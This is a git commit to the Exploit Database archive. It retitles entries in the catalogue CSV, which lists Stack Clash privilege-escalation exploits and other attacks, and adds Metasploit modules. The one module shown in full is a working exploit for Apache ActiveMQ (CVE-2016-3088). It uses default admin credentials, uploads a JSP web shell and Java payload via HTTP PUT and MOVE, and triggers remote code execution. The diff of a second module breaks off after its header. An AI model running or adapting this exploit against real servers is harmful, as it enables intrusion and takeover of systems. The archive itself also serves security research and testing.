DB: 2017-06-30

2 new exploits LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow NetBSD - Stack Clash Proof of Concept FreeBSD - 'FGPU' Stack Clash Proof of Concept FreeBSD - 'FGPE' Stack Clash Proof of Concept FreeBSD - 'setrlimit' Stack Clash Proof of Concept NetBSD - 'Stack Clash' (PoC) FreeBSD - 'FGPU' Stack Clash (PoC) FreeBSD - 'FGPE' Stack Clash (PoC) FreeBSD - 'setrlimit' Stack Clash (PoC) Oracle Solaris 11.1 / 11.3 RSH - Local Root Stack Clash Exploit OpenBSD - 'at' Local Root Stack Clash Exploit Linux - 'offset2lib' Stack Clash Exploit Linux - 'ldso_hwcap' Local Root Stack Clash Exploit Linux - 'ldso_hwcap_64' Local Root Stack Clash Exploit Linux - 'ldso_dynamic' Local Root Stack Clash Exploit Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit Linux Kernel - 'offset2lib' 'Stack Clash' Exploit Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH) Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH) Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit) ActiveMQ < 5.14.0 - web shell upload (Metasploit)
2017-06-30 05:01:20 +00:00 · 2017-06-30 05:01:20 +00:00 · 83c4965a4e
commit 83c4965a4e
parent fa3bfa77fc
3 changed files with 1499 additions and 12 deletions
--- a/files.csv
+++ b/files.csv
@ -5596,13 +5596,13 @@ id,file,description,date,author,platform,type,port
 42249,platforms/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",multiple,dos,0
 42253,platforms/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,windows,dos,0
 42258,platforms/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
-42259,platforms/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack-Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
+42259,platforms/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos,0
 42260,platforms/multiple/dos/42260.py,"IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow",2017-06-26,defensecode,multiple,dos,0
 42264,platforms/windows/dos/42264.txt,"Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API",2017-06-27,"Google Security Research",windows,dos,0
-42272,platforms/netbsd_x86/dos/42272.c,"NetBSD - Stack Clash Proof of Concept",2017-06-28,"Qualys Corporation",netbsd_x86,dos,0
-42277,platforms/freebsd_x86/dos/42277.c,"FreeBSD - 'FGPU' Stack Clash Proof of Concept",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
-42278,platforms/freebsd_x86/dos/42278.c,"FreeBSD - 'FGPE' Stack Clash Proof of Concept",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
-42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash Proof of Concept",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
+42272,platforms/netbsd_x86/dos/42272.c,"NetBSD - 'Stack Clash' (PoC)",2017-06-28,"Qualys Corporation",netbsd_x86,dos,0
+42277,platforms/freebsd_x86/dos/42277.c,"FreeBSD - 'FGPU' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
+42278,platforms/freebsd_x86/dos/42278.c,"FreeBSD - 'FGPE' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
+42279,platforms/freebsd_x86/dos/42279.c,"FreeBSD - 'setrlimit' Stack Clash (PoC)",2017-06-28,"Qualys Corporation",freebsd_x86,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9118,12 +9118,12 @@ id,file,description,date,author,platform,type,port
 42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0
 42265,platforms/linux/local/42265.py,"Flat Assembler 1.7.21 - Buffer Overflow",2017-06-28,"Juan Sacco",linux,local,0
 42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0
-42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1 / 11.3 RSH - Local Root Stack Clash Exploit",2017-06-28,"Qualys Corporation",solaris_x86,local,0
-42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' Local Root Stack Clash Exploit",2017-06-28,"Qualys Corporation",openbsd,local,0
-42273,platforms/lin_x86/local/42273.c,"Linux - 'offset2lib' Stack Clash Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42274,platforms/lin_x86/local/42274.c,"Linux - 'ldso_hwcap' Local Root Stack Clash Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42275,platforms/lin_x86-64/local/42275.c,"Linux - 'ldso_hwcap_64' Local Root Stack Clash Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
-42276,platforms/lin_x86/local/42276.c,"Linux - 'ldso_dynamic' Local Root Stack Clash Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",solaris_x86,local,0
+42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",openbsd,local,0
+42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
+42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15613,7 +15613,7 @@ id,file,description,date,author,platform,type,port
 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
-42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
+42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@ -15675,6 +15675,8 @@ id,file,description,date,author,platform,type,port
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
 42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
+42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
+42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - web shell upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
--- a/platforms/java/remote/42283.rb
+++ b/platforms/java/remote/42283.rb
@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ActiveMQ web shell upload',
+      'Description' => %q(
+        The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0
+        allows remote attackers to upload and execute arbitrary files via an
+        HTTP PUT followed by an HTTP MOVE request.
+      ),
+      'Author'      => [ 'Ian Anderson <andrsn84[at]gmail.com>', 'Hillary Benson <1n7r1gu3[at]gmail.com>' ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2016-3088' ],
+          [ 'URL', 'http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt' ]
+        ],
+      'Privileged'  => true,
+      'Platform'    => %w{ java linux win },
+      'Targets'     =>
+        [
+          [ 'Java Universal',
+            {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA
+            }
+          ],
+          [ 'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86
+            }
+          ],
+          [ 'Windows',
+             {
+               'Platform' => 'win',
+               'Arch' => ARCH_X86
+             }
+           ]
+        ],
+      'DisclosureDate' => "Jun 01 2016",
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('BasicAuthUser', [ true, 'The username to authenticate as', 'admin' ]),
+        OptString.new('BasicAuthPass', [ true, 'The password for the specified username', 'admin' ]),
+        OptString.new('JSP', [ false, 'JSP name to use, excluding the .jsp extension (default: random)', nil ]),
+        OptString.new('AutoCleanup', [ false, 'Remove web shells after callback is received', 'true' ]),
+        Opt::RPORT(8161)
+      ])
+    register_advanced_options(
+      [
+        OptString.new('UploadPath', [false, 'Custom directory into which web shells are uploaded', nil])
+      ])
+  end
+
+  def jsp_text(payload_name)
+    %{
+    <%@ page import="java.io.*"
+    %><%@ page import="java.net.*"
+    %><%
+    URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("./#{payload_name}.jar")).toURI().toURL()});
+    Class c = cl.loadClass("metasploit.Payload");
+    c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
+    %>}
+  end
+
+  def exploit
+    jar_payload = payload.encoded_jar.pack
+    payload_name = datastore['JSP'] || rand_text_alpha(8 + rand(8))
+    host = "#{datastore['RHOST']}:#{datastore['RPORT']}"
+    @url = datastore['SSL'] ? "https://#{host}" : "http://#{host}"
+    paths = get_upload_paths
+    paths.each do |path|
+      if try_upload(path, jar_payload, payload_name)
+        break handler if trigger_payload(payload_name)
+        print_error('Unable to trigger payload')
+      end
+    end
+  end
+
+  def try_upload(path, jar_payload, payload_name)
+    ['.jar', '.jsp'].each do |ext|
+      file_name = payload_name + ext
+      data = ext == '.jsp' ? jsp_text(payload_name) : jar_payload
+      move_headers = { 'Destination' => "#{@url}#{path}#{file_name}" }
+      upload_uri = normalize_uri('fileserver', file_name)
+      print_status("Uploading #{move_headers['Destination']}")
+      register_files_for_cleanup "#{path}#{file_name}" if datastore['AutoCleanup'].casecmp('true')
+      return error_out unless send_request('PUT', upload_uri, 204, 'data' => data) &&
+                              send_request('MOVE', upload_uri, 204, 'headers' => move_headers)
+      @trigger_resource = /webapps(.*)/.match(path)[1]
+    end
+    true
+  end
+
+  def get_upload_paths
+    base_path = "#{get_install_path}/webapps"
+    custom_path = datastore['UploadPath']
+    return [normalize_uri(base_path, custom_path)] unless custom_path.nil?
+    [ "#{base_path}/api/", "#{base_path}/admin/" ]
+  end
+
+  def get_install_path
+    properties_page = send_request('GET', "#{@url}/admin/test/systemProperties.jsp").body
+    match = properties_page.tr("\n", '@').match(/activemq\.home<\/td>@\s*<td>([^@]+)<\/td>/)
+    return match[1] unless match.nil?
+  end
+
+  def send_request(method, uri, expected_response = 200, opts = {})
+    opts['headers'] ||= {}
+    opts['headers']['Authorization'] = basic_auth(datastore['BasicAuthUser'], datastore['BasicAuthPass'])
+    opts['headers']['Connection'] = 'close'
+    r = send_request_cgi(
+      {
+        'method'  => method,
+        'uri'     => uri
+      }.merge(opts)
+    )
+    return false if r.nil? || expected_response != r.code.to_i
+    r
+  end
+
+  def trigger_payload(payload_name)
+    send_request('POST', @url + @trigger_resource + payload_name + '.jsp')
+  end
+
+  def error_out
+    print_error('Upload failed')
+    @trigger_resource = nil
+    false
+  end
+end
--- a/platforms/windows/remote/42282.rb
+++ b/platforms/windows/remote/42282.rb